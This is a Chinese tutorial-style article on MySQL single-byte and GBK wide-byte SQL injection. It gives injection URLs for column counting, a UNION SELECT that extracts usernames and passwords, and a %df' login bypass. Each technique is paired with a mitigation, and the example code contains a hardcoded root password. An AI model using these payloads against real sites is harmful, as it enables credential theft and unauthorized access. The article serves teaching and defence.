欢迎您访问我爱IT技术网,今天小编为你分享的编程技术是:【MySQL中SQL的单字节注入与宽字节注入】,下面是详细的分享!
MySQL中SQL的单字节注入与宽字节注入
一、单字节SQL注入
MYSQL的SQL注入已经由来已久,以下是普遍采用的注入步骤:
1、在GET参数上加一个/*或者#(mysql专有的注释),判断数据库是否是mysql,比如:
http://www.xxx.com.cn/article.php?id=1607 and 1=1/*
2、猜解某表的字段数,从order by 1一直更改到页面出错为止,就可以得到该表的字段数
注入URL:http://www.xxx.com.cn/article.php?id=1607 or 1=1 order by 10#
对应的SQL: select * from articles where id=1607 or 1=1 order by 10#….
3、使用该表和用户表进行关联查询,在文章列表里就可以看到用户名和密码了。当也要猜解用户表的表名和用户名、密码的字段名,比如上一步得到的字段数是5:
注入的URL:http://www.xxx.com.cn/article.php?id=1607 or 1=1 union select username,password,1,2,3 from user
对应的SQL: select * from articles where id=1607 or 1=1 union select username,password,1,2,3 from user
这样就可以在界面上看到用户名和密码了。
解决方法:
过滤数据:这并不是罗唆。在合适的地方使用良好的数据过滤,可以减小多数安全隐患,甚至可以消除其中的一部分。
将数据用括号包含:如果你的数据库允许(MySQL 允许),在 SQL 语句中,不论什么类型的数据都用单引号包含起来。
转义数据:一些合法的数据可能在无意中破坏 SQL 语句本身的格式。使用 mysql_escape_string() 或者所使用数据库提供的转移函数。如果没有提供这样的函数,addslashes() 也是不错的最后选择。
二、宽字节注入
宽字节注入也是在最近的项目中发现的问题,大家都知道%df’ 被PHP转义(开启GPC、用addslashes函数,或者icov等),单引号被加上反斜杠\,变成了 %df\’,其中\的十六进制是 %5C ,那么现在 %df\’=%df%5c%27,如果程序的默认字符集是GBK等宽字节字符集,则MYSQL用GBK的编码时,会认为 %df%5c 是一个宽字符,也就是縗’,也就是说:%df\’=%df%5c%27=縗’,有了单引号就好注入了。比如:
|
以下为引用的内容: $conn=mysql_connect(”localhost”,”root”,”2sdfxedd”); |
则通过以下注入即可:
http://www.xxx.com/login.php?user=%df’%20or%201=1%20limit%201,1%23&pass=
对应的SQL是:
select * from cms_user where username=‘運’ or 1=1 limit 1,1#’ and password=”
解决方法:就是在初始化连接和字符集之后,使用SET character_set_client=binary来设定客户端的字符集是二进制的。如:
|
以下为引用的内容: mysql_query(”SET character_set_client=binary”); |
以上所分享的是关于MySQL中SQL的单字节注入与宽字节注入,下面是编辑为你推荐的有价值的用户互动:
相关问题:sql中怎么注入单引号的值
答:单引号前另外加一个单引号。我举一个例子:SELECT 'o''liven' 注意“o”和“liven”前面有两个单引号,但是只输出一个运行输出结果:插入、删除和更新也是如此。 >>详细
相关问题:关于SQL注入。
答:我还没进公司时,网站平均15天被注入一次,我进公司以后,大力整改,至今3个月,未见被注入。 我告诉你我的方法。 总结起来就是:关键词屏蔽或替换 + 参数法sql。 1.封装一个类,用来将传入的参数进行关键词的屏蔽和替换(像ID之类的参数,可以... >>详细
相关问题:黑客SQL注入里面的几个基础问题?
答:与什么数据库无关,黑客首先要知道对方使用的什么数据库,然后针对不同数据库用不同的语句去攻击而已,一般从页面返回的错误信息中可以看出来网站使用的是哪个数据库 order by xxx是用来判断数据库表有几个字段的,例,数据表有8个字段,执行数... >>详细
- 评论列表(网友评论仅供网友表达个人看法,并不表明本站同意其观点或证实其描述)
-
